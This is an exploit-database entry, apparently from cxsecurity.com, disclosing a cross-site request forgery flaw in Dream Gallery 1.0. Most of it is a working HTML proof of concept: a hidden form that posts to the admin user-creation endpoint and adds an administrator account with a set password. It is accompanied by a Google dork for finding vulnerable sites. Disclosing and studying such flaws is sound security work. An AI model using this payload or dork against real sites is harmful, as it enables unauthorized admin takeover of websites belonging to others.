Dream Gallery 1.0 Cross Site Request Forgery

2016.06.07
Credit: Ali Ghanbari
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-352

<!-- # Exploit Title: Dream Gallery - CSRF Add Admin Exploit # Google Dork: "Design by Rafael Clares" # Date: 2016/06/03 # Exploit Author: Ali Ghanbari # Vendor Homepage: http://phpstaff.com.br/ # Version: 1.0 #Exploit: --> <html> <body> <form method="post" action="http://localhost/{PACH}/admin/usuario.php?action=incluir"> <input type="hidden" name="user_login" value="ali"> <input type="hidden" name="user_password" type="hidden" value="123456" > <input type="hidden" name="user_email" value=""> <input type="submit" value="create"> </form> </body> </html> <!-- ######################### [+]Exploit by: Ali Ghanbari [+]My Telegram :@Exploiter007 -->


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top